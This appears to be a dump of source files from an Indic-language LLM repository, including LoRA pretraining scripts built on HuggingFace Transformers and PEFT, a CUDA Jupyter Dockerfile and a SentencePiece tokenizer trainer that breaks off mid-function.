logger.info(tokenizer.decode(eval_dataset[0]['input_ids']))
if model_args.model_name_or_path:
torch_dtype = (
model_args.torch_dtype
if model_args.torch_dtype in ["auto", None]
else getattr(torch, model_args.torch_dtype)
)
model = AutoModelForCausalLM.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
torch_dtype=torch_dtype,
low_cpu_mem_usage=True
)
else:
model = AutoModelForCausalLM.from_config(config)
n_params = sum({p.data_ptr(): p.numel() for p in model.parameters()}.values())
logger.info(f"Training new model from scratch - Total size={n_params/2**20:.2f}M params")
# model_vocab_size = model.get_output_embeddings().weight.size(0)
# if not (
# (model_vocab_size==32000 and len(tokenizer)==49953) or \
# (model_vocab_size==32000 and len(tokenizer)==32000) or \
# (model_vocab_size==49953 and len(tokenizer)==49953) or \
# (model_vocab_size==49954 and len(tokenizer)==49954)
# ):
# raise ValueError(
# f"The combination of base model (size: {model_vocab_size}) and tokenizer (size: {len(tokenizer)}) is not a valid configuration. Please check our project wiki for further information. \n"
# "Valid configurations (base model / tokenizer):\n"
# "- Continue pre-training original LLaMA: 32000 / 32000 \n"
# "- Pre-training Chinese LLaMA based on original LLaMA: 32000 / 49953 \n"
# "- Continue pre-training Chinese LLaMA: 49953 / 49953 \n"
# "- Continue pre-training Chinese Alpaca: 49954 / 49954 \n")
# model.resize_token_embeddings(len(tokenizer))
if training_args.peft_path is not None:
logger.info("Peft from pre-trained model")
model = PeftModel.from_pretrained(model, training_args.peft_path)
else:
logger.info("Init new peft model")
target_modules = training_args.trainable.split(',')
modules_to_save = training_args.modules_to_save
if modules_to_save is not None:
modules_to_save = modules_to_save.split(',')
lora_rank = training_args.lora_rank
lora_dropout = training_args.lora_dropout
lora_alpha = training_args.lora_alpha
logger.info(f"target_modules: {target_modules}")
logger.info(f"lora_rank: {lora_rank}")
peft_config = LoraConfig(
task_type=TaskType.CAUSAL_LM,
target_modules=target_modules,
inference_mode=False,
r=lora_rank, lora_alpha=lora_alpha,
lora_dropout=lora_dropout,
modules_to_save=modules_to_save)
model = get_peft_model(model, peft_config)
model.print_trainable_parameters()
old_state_dict = model.state_dict
model.state_dict = (
lambda self, *_, **__: get_peft_model_state_dict(self, old_state_dict())
).__get__(model, type(model))
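    # The patch above makes checkpoints saved through Trainer contain only the
    # PEFT (LoRA) weights rather than the full model state dict; whether it is
    # still required depends on the installed peft version.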
# Initialize our Trainer
trainer = Trainer(
model=model,
args=training_args,
train_dataset=train_dataset if training_args.do_train else None,
eval_dataset=eval_dataset if training_args.do_eval else None,
tokenizer=tokenizer,
data_collator=fault_tolerance_data_collator,
compute_metrics=compute_metrics if training_args.do_eval and not is_torch_tpu_available() else None,
preprocess_logits_for_metrics=preprocess_logits_for_metrics
if training_args.do_eval and not is_torch_tpu_available()
else None,
)
trainer.add_callback(SavePeftModelCallback)
# Training
if training_args.do_train:
checkpoint = None
if training_args.resume_from_checkpoint is not None:
checkpoint = training_args.resume_from_checkpoint
elif last_checkpoint is not None:
checkpoint = last_checkpoint
train_result = trainer.train(resume_from_checkpoint=checkpoint)
metrics = train_result.metrics
max_train_samples = (
data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset)
)
metrics["train_samples"] = min(max_train_samples, len(train_dataset))
trainer.log_metrics("train", metrics)
trainer.save_metrics("train", metrics)
trainer.save_state()
# Evaluation
if training_args.do_eval:
logger.info("*** Evaluate ***")
metrics = trainer.evaluate()
max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset)
metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset))
try:
perplexity = math.exp(metrics["eval_loss"])
except OverflowError:
perplexity = float("inf")
metrics["perplexity"] = perplexity
trainer.log_metrics("eval", metrics)
trainer.save_metrics("eval", metrics)
if __name__ == "__main__":
main() | 28,345 | Python | .py | 574 | 40.578397 | 200 | 0.647091 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,519 | pretrain.py | adithya-s-k_Indic-llm/archives/pretraining/pretrain.py | #!/usr/bin/env python
# coding=utf-8
# Copyright 2020 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for causal language modeling (GPT, GPT-2, CTRL, ...) on a text file or a dataset.
Here is the full list of checkpoints on the hub that can be fine-tuned by this script:
https://huggingface.co/models?filter=text-generation
"""
# You can also adapt this script on your own causal language modeling task. Pointers for this are left as comments.
import logging
import numpy as np
import math
import os
import sys
from dataclasses import dataclass, field
from itertools import chain
from typing import Optional, List, Dict, Any, Mapping
from pathlib import Path
import datasets
import torch
from datasets import load_dataset, concatenate_datasets
import transformers
from transformers import (
CONFIG_MAPPING,
MODEL_FOR_CAUSAL_LM_MAPPING,
AutoConfig,
AutoModelForCausalLM,
LlamaForCausalLM,
LlamaTokenizer,
AutoTokenizer,
HfArgumentParser,
Trainer,
TrainingArguments,
is_torch_tpu_available,
set_seed,
)
from transformers.testing_utils import CaptureLogger
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import send_example_telemetry
from transformers.utils.versions import require_version
from sklearn.metrics import accuracy_score
from peft import LoraConfig, TaskType, get_peft_model, PeftModel, get_peft_model_state_dict
from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR
class SavePeftModelCallback(transformers.TrainerCallback):
def save_model(self, args, state, kwargs):
if state.best_model_checkpoint is not None:
checkpoint_folder = os.path.join(state.best_model_checkpoint, "pt_lora_model")
else:
checkpoint_folder = os.path.join(args.output_dir, f"{PREFIX_CHECKPOINT_DIR}-{state.global_step}")
peft_model_path = os.path.join(checkpoint_folder, "pt_lora_model")
kwargs["model"].save_pretrained(peft_model_path)
kwargs["tokenizer"].save_pretrained(peft_model_path)
def on_save(self, args, state, control, **kwargs):
self.save_model(args, state, kwargs)
return control
def on_train_end(self, args, state, control, **kwargs):
peft_model_path = os.path.join(args.output_dir, "pt_lora_model")
kwargs["model"].save_pretrained(peft_model_path)
kwargs["tokenizer"].save_pretrained(peft_model_path)
def accuracy(predictions, references, normalize=True, sample_weight=None):
return {
"accuracy": float(
accuracy_score(references, predictions, normalize=normalize, sample_weight=sample_weight)
)
}
def compute_metrics(eval_preds):
preds, labels = eval_preds
# preds have the same shape as the labels, after the argmax(-1) has been calculated
# by preprocess_logits_for_metrics but we need to shift the labels
labels = labels[:, 1:].reshape(-1)
preds = preds[:, :-1].reshape(-1)
return accuracy(predictions=preds, references=labels)
def preprocess_logits_for_metrics(logits, labels):
if isinstance(logits, tuple):
# Depending on the model and config, logits may contain extra tensors,
# like past_key_values, but logits always come first
logits = logits[0]
return logits.argmax(dim=-1)
def fault_tolerance_data_collator(features: List) -> Dict[str, Any]:
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label = first["label"].item() if isinstance(first["label"], torch.Tensor) else first["label"]
dtype = torch.long if isinstance(label, int) else torch.float
batch["labels"] = torch.tensor([f["label"] for f in features], dtype=dtype)
elif "label_ids" in first and first["label_ids"] is not None:
if isinstance(first["label_ids"], torch.Tensor):
batch["labels"] = torch.stack([f["label_ids"] for f in features])
else:
dtype = torch.long if isinstance(first["label_ids"][0], int) else torch.float
batch["labels"] = torch.tensor([f["label_ids"] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
try:
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([f[k] for f in features])
elif isinstance(v, np.ndarray):
batch[k] = torch.tensor(np.stack([f[k] for f in features]))
else:
batch[k] = torch.tensor([f[k] for f in features])
except ValueError: # quick fix by simply take the first example
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([features[0][k]] * len(features))
elif isinstance(v, np.ndarray):
batch[k] = torch.tensor(np.stack([features[0][k]] * len(features)))
else:
batch[k] = torch.tensor([features[0][k]] * len(features))
return batch
MODEL_CONFIG_CLASSES = list(MODEL_FOR_CAUSAL_LM_MAPPING.keys())
MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.
"""
model_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": (
"The model checkpoint for weights initialization.Don't set if you want to train a model from scratch."
)
},
)
tokenizer_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": (
"The tokenizer for weights initialization.Don't set if you want to train a model from scratch."
)
},
)
model_type: Optional[str] = field(
default=None,
metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)},
)
config_overrides: Optional[str] = field(
default=None,
metadata={
"help": (
"Override some existing default config settings when a model is trained from scratch. Example: "
"n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index"
)
},
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
)
use_fast_tokenizer: bool = field(
default=True,
metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": (
"Will use the token generated when running `huggingface-cli login` (necessary to use this script "
"with private models)."
)
},
)
torch_dtype: Optional[str] = field(
default=None,
metadata={
"help": (
"Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the "
"dtype will be automatically derived from the model's weights."
),
"choices": ["auto", "bfloat16", "float16", "float32"],
},
)
def __post_init__(self):
if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None):
raise ValueError(
"--config_overrides can't be used in combination with --config_name or --model_name_or_path"
)
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
dataset_dir: Optional[str] = field(
default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
)
dataset_config_name: Optional[str] = field(
default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
)
train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."})
validation_file: Optional[str] = field(
default=None,
metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
)
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
)
},
)
streaming: bool = field(default=False, metadata={"help": "Enable streaming mode"})
block_size: Optional[int] = field(
default=None,
metadata={
"help": (
"Optional input sequence length after tokenization. "
"The training dataset will be truncated in block of this size for training. "
"Default to the model max input length for single sentence inputs (take into account special tokens)."
)
},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
validation_split_percentage: Optional[float] = field(
default=0.05,
metadata={
"help": "The percentage of the train set used as validation set in case there's no validation split"
},
)
preprocessing_num_workers: Optional[int] = field(
default=None,
metadata={"help": "The number of processes to use for the preprocessing."},
)
keep_linebreaks: bool = field(
default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."}
)
data_cache_dir: Optional[str] = field(default="./", metadata={"help": "The datasets processed stored"})
def __post_init__(self):
if self.streaming:
require_version("datasets>=2.0.0", "The streaming feature requires `datasets>=2.0.0`")
@dataclass
class MyTrainingArguments(TrainingArguments):
    trainable: Optional[str] = field(default="q_proj,v_proj")
    lora_rank: Optional[int] = field(default=8)
    lora_dropout: Optional[float] = field(default=0.1)
    lora_alpha: Optional[float] = field(default=32.)
    modules_to_save: Optional[str] = field(default=None)
    debug_mode: Optional[bool] = field(default=False)
    peft_path: Optional[str] = field(default=None)
logger = logging.getLogger(__name__)
def main():
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, MyTrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The
# information sent is the one passed as arguments along with your Python/PyTorch versions.
send_example_telemetry("run_clm", model_args, data_args)
# Setup logging
    logging.basicConfig(
        format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
        datefmt="%m/%d/%Y %H:%M:%S",
        level=logging.INFO,  # if training_args.local_rank in [-1, 0] else logging.WARN,
        handlers=[logging.StreamHandler(sys.stdout)],
    )
if training_args.should_log:
# The default of training_args.log_level is passive, so we set log level at info here to have that default.
transformers.utils.logging.set_verbosity_info()
log_level = training_args.get_process_log_level()
logger.setLevel(log_level)
datasets.utils.logging.set_verbosity(log_level)
transformers.utils.logging.set_verbosity(log_level)
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
# transformers.tokenization_utils.logging.set_verbosity_warning()
# Log on each process the small summary:
    logger.warning(
        f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}, "
        + f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
    )
# Detecting last checkpoint.
last_checkpoint = None
if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
last_checkpoint = get_last_checkpoint(training_args.output_dir)
if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to overcome."
)
elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
logger.info(
f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
"the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
# Set seed before initializing model.
set_seed(training_args.seed)
config_kwargs = {
"cache_dir": model_args.cache_dir,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.config_name:
config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs)
elif model_args.model_name_or_path:
config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs)
else:
config = CONFIG_MAPPING[model_args.model_type]()
logger.warning("You are instantiating a new config instance from scratch.")
if model_args.config_overrides is not None:
logger.info(f"Overriding config: {model_args.config_overrides}")
config.update_from_string(model_args.config_overrides)
logger.info(f"New config: {config}")
tokenizer_kwargs = {
"cache_dir": model_args.cache_dir,
"use_fast": model_args.use_fast_tokenizer,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.tokenizer_name:
tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs)
elif model_args.tokenizer_name_or_path:
tokenizer = LlamaTokenizer.from_pretrained(model_args.tokenizer_name_or_path, **tokenizer_kwargs)
else:
raise ValueError(
"You are instantiating a new tokenizer from scratch. This is not supported by this script."
"You can do it from another script, save it, and load it from here, using --tokenizer_name."
)
# Preprocessing the datasets.
# First we tokenize all the texts.
# since this will be pickled to avoid _LazyModule error in Hasher force logger loading before tokenize_function
tok_logger = transformers.utils.logging.get_logger("transformers.tokenization_utils_base")
def tokenize_function(examples):
with CaptureLogger(tok_logger) as cl:
output = tokenizer(examples["text"])
# clm input could be much much longer than block_size
if "Token indices sequence length is longer than the" in cl.out:
tok_logger.warning(
"^^^^^^^^^^^^^^^^ Please ignore the warning above - this long input will be chunked into smaller bits"
" before being passed to the model."
)
return output
if data_args.block_size is None:
block_size = tokenizer.model_max_length
if block_size > 1024:
logger.warning(
"The chosen tokenizer supports a `model_max_length` that is longer than the default `block_size` value"
" of 1024. If you would like to use a longer `block_size` up to `tokenizer.model_max_length` you can"
" override this default with `--block_size xxx`."
)
block_size = 1024
else:
if data_args.block_size > tokenizer.model_max_length:
logger.warning(
f"The block_size passed ({data_args.block_size}) is larger than the maximum length for the model"
f"({tokenizer.model_max_length}). Using block_size={tokenizer.model_max_length}."
)
block_size = min(data_args.block_size, tokenizer.model_max_length)
# Main data processing function that will concatenate all texts from our dataset and generate chunks of block_size.
def group_texts(examples):
# Concatenate all texts.
concatenated_examples = {k: list(chain(*examples[k])) for k in examples.keys()}
total_length = len(concatenated_examples[list(examples.keys())[0]])
# We drop the small remainder, we could add padding if the model supported it instead of this drop, you can
# customize this part to your needs.
if total_length >= block_size:
total_length = (total_length // block_size) * block_size
# Split by chunks of max_len.
result = {
k: [t[i : i + block_size] for i in range(0, total_length, block_size)]
for k, t in concatenated_examples.items()
}
result["labels"] = result["input_ids"].copy()
return result
with training_args.main_process_first(desc="dataset map tokenization and grouping"):
lm_datasets = []
path = Path(data_args.dataset_dir)
files = [file.name for file in path.glob("*.txt")]
if training_args.debug_mode is True:
files = [files[0]]
for idx, file in enumerate(files):
data_file = os.path.join(path, file)
filename = ''.join(file.split(".")[:-1])
cache_path = os.path.join(data_args.data_cache_dir, filename)
os.makedirs(cache_path, exist_ok=True)
try:
processed_dataset = datasets.load_from_disk(cache_path, keep_in_memory=False)
                logger.info(f'training dataset {filename} has been loaded from disk')
except Exception:
cache_dir = os.path.join(data_args.data_cache_dir, filename+"_text")
os.makedirs(cache_dir, exist_ok=True)
raw_dataset = load_dataset("text", data_files=data_file, cache_dir=cache_dir, keep_in_memory=False)
logger.info(f"{file} has been loaded")
tokenized_dataset = raw_dataset.map(
tokenize_function,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns="text",
load_from_cache_file=True,
keep_in_memory=False,
cache_file_names = {k: os.path.join(cache_dir, 'tokenized.arrow') for k in raw_dataset},
desc="Running tokenizer on dataset",
)
grouped_datasets = tokenized_dataset.map(
group_texts,
batched=True,
num_proc=data_args.preprocessing_num_workers,
load_from_cache_file=True,
keep_in_memory=False,
cache_file_names = {k: os.path.join(cache_dir, 'grouped.arrow') for k in tokenized_dataset},
desc=f"Grouping texts in chunks of {block_size}",
)
processed_dataset = grouped_datasets
processed_dataset.save_to_disk(cache_path)
if idx == 0:
lm_datasets = processed_dataset['train']
else:
assert lm_datasets.features.type == processed_dataset["train"].features.type
lm_datasets = concatenate_datasets([lm_datasets, processed_dataset["train"]])
lm_datasets = lm_datasets.train_test_split(test_size = data_args.validation_split_percentage)
if training_args.do_train:
train_dataset = lm_datasets['train']
if data_args.max_train_samples is not None:
max_train_samples = min(len(train_dataset), data_args.max_train_samples)
train_dataset = train_dataset.select(range(max_train_samples))
logger.info(f"Num train_samples {len(train_dataset)}")
logger.info("training example:")
logger.info(tokenizer.decode(train_dataset[0]['input_ids']))
if training_args.do_eval:
eval_dataset = lm_datasets["test"]
if data_args.max_eval_samples is not None:
max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples)
eval_dataset = eval_dataset.select(range(max_eval_samples))
logger.info(f"Num eval_samples {len(eval_dataset)}")
logger.info("training example:")
logger.info(tokenizer.decode(eval_dataset[0]['input_ids']))
if model_args.model_name_or_path:
torch_dtype = (
model_args.torch_dtype
if model_args.torch_dtype in ["auto", None]
else getattr(torch, model_args.torch_dtype)
)
model = LlamaForCausalLM.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
torch_dtype=torch_dtype,
low_cpu_mem_usage=True
)
else:
model = AutoModelForCausalLM.from_config(config)
n_params = sum({p.data_ptr(): p.numel() for p in model.parameters()}.values())
logger.info(f"Training new model from scratch - Total size={n_params/2**20:.2f}M params")
model_vocab_size = model.get_output_embeddings().weight.size(0)
if not (
(model_vocab_size==32000 and len(tokenizer)==49953) or \
(model_vocab_size==32000 and len(tokenizer)==32000) or \
(model_vocab_size==49953 and len(tokenizer)==49953) or \
(model_vocab_size==49954 and len(tokenizer)==49954)
):
raise ValueError(
f"The combination of base model (size: {model_vocab_size}) and tokenizer (size: {len(tokenizer)}) is not a valid configuration. Please check our project wiki for further information. \n"
"Valid configurations (base model / tokenizer):\n"
"- Continue pre-training original LLaMA: 32000 / 32000 \n"
"- Pre-training Chinese LLaMA based on original LLaMA: 32000 / 49953 \n"
"- Continue pre-training Chinese LLaMA: 49953 / 49953 \n"
"- Continue pre-training Chinese Alpaca: 49954 / 49954 \n")
model.resize_token_embeddings(len(tokenizer))
if training_args.peft_path is not None:
logger.info("Peft from pre-trained model")
model = PeftModel.from_pretrained(model, training_args.peft_path)
else:
logger.info("Init new peft model")
target_modules = training_args.trainable.split(',')
modules_to_save = training_args.modules_to_save
if modules_to_save is not None:
modules_to_save = modules_to_save.split(',')
lora_rank = training_args.lora_rank
lora_dropout = training_args.lora_dropout
lora_alpha = training_args.lora_alpha
logger.info(f"target_modules: {target_modules}")
logger.info(f"lora_rank: {lora_rank}")
peft_config = LoraConfig(
task_type=TaskType.CAUSAL_LM,
target_modules=target_modules,
inference_mode=False,
r=lora_rank, lora_alpha=lora_alpha,
lora_dropout=lora_dropout,
modules_to_save=modules_to_save)
model = get_peft_model(model, peft_config)
model.print_trainable_parameters()
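    # Monkey-patch `state_dict` so that checkpoints written by the Trainer contain
    # only the PEFT (LoRA) weights rather than the full base model, keeping the
    # saved files small.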
old_state_dict = model.state_dict
model.state_dict = (
lambda self, *_, **__: get_peft_model_state_dict(self, old_state_dict())
).__get__(model, type(model))
# Initialize our Trainer
trainer = Trainer(
model=model,
args=training_args,
train_dataset=train_dataset if training_args.do_train else None,
eval_dataset=eval_dataset if training_args.do_eval else None,
tokenizer=tokenizer,
data_collator=fault_tolerance_data_collator,
compute_metrics=compute_metrics if training_args.do_eval and not is_torch_tpu_available() else None,
preprocess_logits_for_metrics=preprocess_logits_for_metrics
if training_args.do_eval and not is_torch_tpu_available()
else None,
)
trainer.add_callback(SavePeftModelCallback)
# Training
if training_args.do_train:
checkpoint = None
if training_args.resume_from_checkpoint is not None:
checkpoint = training_args.resume_from_checkpoint
elif last_checkpoint is not None:
checkpoint = last_checkpoint
train_result = trainer.train(resume_from_checkpoint=checkpoint)
metrics = train_result.metrics
max_train_samples = (
data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset)
)
metrics["train_samples"] = min(max_train_samples, len(train_dataset))
trainer.log_metrics("train", metrics)
trainer.save_metrics("train", metrics)
trainer.save_state()
# Evaluation
if training_args.do_eval:
logger.info("*** Evaluate ***")
metrics = trainer.evaluate()
max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset)
metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset))
try:
perplexity = math.exp(metrics["eval_loss"])
except OverflowError:
perplexity = float("inf")
metrics["perplexity"] = perplexity
trainer.log_metrics("eval", metrics)
trainer.save_metrics("eval", metrics)
if __name__ == "__main__":
main() | 28,312 | Python | .py | 574 | 40.409408 | 198 | 0.647754 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,520 | jupyter.dockerfile | adithya-s-k_Indic-llm/docker_environment/jupyter.dockerfile | ARG CUDA_VERSION="11.8.0"
ARG CUDNN_VERSION="8"
ARG UBUNTU_VERSION="22.04"
ARG MAX_JOBS=4
FROM nvidia/cuda:$CUDA_VERSION-cudnn$CUDNN_VERSION-devel-ubuntu$UBUNTU_VERSION as base-builder
ENV PATH="/root/miniconda3/bin:${PATH}"
ARG PYTHON_VERSION="3.9"
ARG PYTORCH_VERSION="2.0.1"
ARG CUDA="118"
ARG TORCH_CUDA_ARCH_LIST="7.0 7.5 8.0 8.6 9.0+PTX"
ENV PYTHON_VERSION=$PYTHON_VERSION
ENV TORCH_CUDA_ARCH_LIST=$TORCH_CUDA_ARCH_LIST
RUN apt-get update \
&& apt-get install -y wget git build-essential ninja-build git-lfs libaio-dev && rm -rf /var/lib/apt/lists/* \
&& wget \
https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh \
&& mkdir /root/.conda \
&& bash Miniconda3-latest-Linux-x86_64.sh -b \
&& rm -f Miniconda3-latest-Linux-x86_64.sh \
&& conda create -n "py${PYTHON_VERSION}" python="${PYTHON_VERSION}"
ENV PATH="/root/miniconda3/envs/py${PYTHON_VERSION}/bin:${PATH}"
WORKDIR /workspace
RUN python3 -m pip install --upgrade pip && pip3 install packaging && \
python3 -m pip install --no-cache-dir -U torch==${PYTORCH_VERSION}+cu${CUDA} deepspeed-kernels --extra-index-url https://download.pytorch.org/whl/cu$CUDA
RUN git lfs install --skip-repo && \
pip3 install awscli && \
    # The base image ships with `pydantic==1.8.2`, which does not work; pin a newer release
pip3 install -U --no-cache-dir pydantic==1.10.10
RUN pip install \
numpy \
torch \
jupyterlab
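# Example build/run (image tag is hypothetical; adjust as needed):
#   docker build -f jupyter.dockerfile -t indic-llm-jupyter .
#   docker run --gpus all -p 8888:8888 indic-llm-jupyter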
# start jupyter lab
CMD ["jupyter", "lab", "--ip=0.0.0.0", "--port=8888", "--allow-root", "--no-browser"]
EXPOSE 8888 | 1,541 | Python | .py | 35 | 41.142857 | 157 | 0.704545 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,521 | utils.py | adithya-s-k_Indic-llm/indic_llm/utils.py | from art import text2art
def push_model_to_hub() -> None:
pass
def print_indic_llm_text_art(suffix=None):
font = "nancyj"
ascii_text = " indic-llm"
if suffix:
ascii_text += f" x {suffix}"
ascii_art = text2art(ascii_text, font=font)
print("\n\n")
print(ascii_art) | 303 | Python | .py | 11 | 23.181818 | 47 | 0.632302 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,522 | __init__.py | adithya-s-k_Indic-llm/indic_llm/__init__.py | import re
import logging
# from indic_llm.dataset import *
# from indic_llm.tokenisation import *
from indic_llm.utils import * | 128 | Python | .py | 5 | 24.6 | 38 | 0.804878 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,523 | tokenization.py | adithya-s-k_Indic-llm/indic_llm/tokenization.py | import argparse
import os
import time
import sentencepiece as spm
from sentencepiece import sentencepiece_model_pb2 as sp_pb2_model
from transformers import AutoTokenizer, LlamaTokenizer
class SentencePieceTrainer:
def __init__(self):
self.vocab_size = 20000
self.character_coverage = 1.0
self.model_type = "unigram"
# This is NOT perfect but gives high level idea about the composition of the tokenizer
self.language_unicode_ranges = {
'European': ('\u0000', '\u007F'),
'Chinese (Basic)': ('\u4E00', '\u9FFF'),
'Tamil': ('\u0B80', '\u0BFF'),
'Hindi': ('\u0900', '\u097F'),
'Telugu': ('\u0C00', '\u0C7F'),
'Malayalam': ('\u0D00', '\u0D7F'),
'Kannada': ('\u0C80', '\u0CFF'),
'Marathi': ('\u0900', '\u097F'), # Marathi shares the range with Hindi
'Bengali': ('\u0980', '\u09FF'),
}
self.indic_language_unicode_ranges = {
'Devanagari': ('\u0900', '\u097F'),
'Bengali': ('\u0980', '\u09FF'),
'Gurmukhi': ('\u0A00', '\u0A7F'),
'Gujarati': ('\u0A80', '\u0AFF'),
'Oriya': ('\u0B00', '\u0B7F'),
'Tamil': ('\u0B80', '\u0BFF'),
'Telugu': ('\u0C00', '\u0C7F'),
'Kannada': ('\u0C80', '\u0CFF'),
'Malayalam': ('\u0D00', '\u0D7F'),
'Marathi': ('\u0900', '\u097F'),
}
def train_tokenizer(self, input_file, model_prefix , output_dir):
start_time = time.time()
output_model_path = os.path.join(output_dir, f"{self.model_prefix}.model")
spm.SentencePieceTrainer.train(
input=input_file,
model_prefix=model_prefix,
vocab_size=self.vocab_size,
character_coverage=self.character_coverage,
model_type=self.model_type,
train_extremely_large_corpus=True
)
os.rename(
f"{model_prefix}.vocab",
os.path.join(output_dir, f"{model_prefix}.vocab"),
)
os.rename(
f"{model_prefix}.model",
os.path.join(output_dir, f"{model_prefix}.model"),
)
end_time = time.time()
total_time_seconds = end_time - start_time
total_time_minutes = total_time_seconds / 60.0
print(f"Total time taken to train the model: {total_time_minutes:.2f} minutes")
return output_model_path
def merge_tokenizer(self, base_tokenizer_dir, extended_tokenizer_dir):
        # Load the base tokenizer (use the slow tokenizer so the underlying
        # SentencePiece model is accessible) and the newly trained SentencePiece model.
        base_tokenizer = AutoTokenizer.from_pretrained(base_tokenizer_dir, use_fast=False)
extended_tokenizer = spm.SentencePieceProcessor()
extended_tokenizer.Load(extended_tokenizer_dir)
base_spm = sp_pb2_model.ModelProto()
base_spm.ParseFromString(base_tokenizer.sp_model.serialized_model_proto())
extended_spm = sp_pb2_model.ModelProto()
extended_spm.ParseFromString(extended_tokenizer.serialized_model_proto())
# print number of tokens
